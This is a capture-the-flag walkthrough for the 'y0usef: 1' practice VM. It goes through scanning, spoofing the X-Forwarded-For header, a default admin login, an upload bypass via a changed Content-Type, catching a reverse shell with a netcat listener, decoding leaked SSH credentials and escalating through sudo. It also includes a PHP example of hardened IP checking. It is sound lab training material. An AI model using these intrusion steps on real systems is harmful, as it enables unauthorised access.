y0usef: 1 Walkthrough

Dark-0
Dec 27, 2020

Description

Get two flags

Difficulty : easy

This works better with VirtualBox rather than VMware

Network Scanning

We always start with network scanning. Let’s find the target IP address by running netdiscover.

$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16

As the netdiscover result shows, our target IP address is 10.10.10.24.

Our next step is scanning the target machine. Let’s start with nmap.

$ nmap -p- -sV 10.10.10.24

Enumeration

Firstly, moving towards port 80.

On manual enumeration, I couldn’t find any way in.

I also tried dirb and nikto, but here too I couldn’t find any way in.

Now I had to log in as guest to the box to know what is actually happening.

guest-YN6JxL@yousef-VirtualBox:/$ cd /var/www/html/

There is a directory adminstration/

Let’s visit this directory.

http://10.10.10.24/adminstration

This was another stuck point…haha..!!! But probably not….

We are going to enumerate the adminstration directory.

guest-YN6JxL@yousef-VirtualBox:/$ cat /var/www/html/adminstration/index.php

$allowedIps = ['127.0.0.1'];
$userIp = isset($_SERVER['HTTP_X_FORWARDED_FOR']);

Okay, now we have to change the header. Here I am using an add-on named “SIMPLE MODIFY HEADERS”.

Yes..!!! This worked.
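Why this check fails, as an added example that is not the VM's own code: an allow-list that reads the address from a request header trusts a value the client controls, while a check based on REMOTE_ADDR does not. The function names, the TRUSTED_PROXIES list, the fallback to REMOTE_ADDR in the weak version and the sample requests are assumptions constructed for illustration; the page shows only two lines of the original index.php.

```php
<?php
// Added example. Names and sample values below are constructed, not from the VM.
const ALLOWED_IPS = ['127.0.0.1'];
const TRUSTED_PROXIES = ['10.0.0.5'];   // hypothetical reverse proxy address

// Weak pattern: a client-supplied header wins over the socket address.
function clientIpWeak(array $server): string
{
    return $server['HTTP_X_FORWARDED_FOR'] ?? $server['REMOTE_ADDR'];
}

// Hardened: REMOTE_ADDR (the TCP peer) is authoritative. X-Forwarded-For is
// read only when the peer is a known proxy, and is walked right to left,
// stopping at the first hop that is not itself a trusted proxy.
function clientIpHardened(array $server, array $trusted = TRUSTED_PROXIES): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($peer, $trusted, true)) {
        return $peer;                      // direct connection: ignore the header
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $peer;                  // missing or malformed header
        }
        if (!in_array($hop, $trusted, true)) {
            return $hop;                   // nearest address the proxy vouches for
        }
    }
    return $peer;
}

function isAllowed(string $ip): bool
{
    return in_array($ip, ALLOWED_IPS, true);
}

// Constructed request 1: direct connection whose header claims loopback.
$direct = ['REMOTE_ADDR' => '10.10.10.1', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'];
// Constructed request 2: same claim, relayed by the proxy, which appended
// the address it actually saw to the right of the client-sent value.
$proxied = ['REMOTE_ADDR' => '10.0.0.5',
            'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 10.10.10.1'];

var_dump(isAllowed(clientIpWeak($direct)));       // header-trusting check
var_dump(isAllowed(clientIpHardened($direct)));   // peer-based check, direct
var_dump(isAllowed(clientIpHardened($proxied)));  // peer-based check, via proxy
```

Only the header-trusting check accepts the spoofed loopback claim. An address allow-list is not a substitute for authentication on an admin panel, and the default admin:admin credentials remain a separate weakness.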

Log in with admin:admin. That’s quite simple.

Getting Reverse Shell..!!!!

And finally we can upload our reverse shell. But we cannot upload a .php file, so here we’ll use Burp Suite to intercept the request and change the content type to image/jpg.

Our reverse shell has been uploaded.

Hit the URL to call our shell.

http://10.10.10.24/adminstration/upload/files/1609071720rs.php

And turn on the listener.

$ nc -nlvp 1234

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

user.txt is encoded in base64, so let’s decode it.

$ echo "c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=" | base64 -d

Now we have the SSH username and password.

Logging in over SSH with yousef:yousef123

$ ssh yousef@10.10.10.24

Way to root…!!!!

$ sudo -l

Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL

$ sudo su

root@yousef-VirtualBox:/home/yousef# cat /root/root.txt

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

That’s it..!! Thanks for reading. Stay tuned for similar walkthroughs and much more.

:- Dark-0
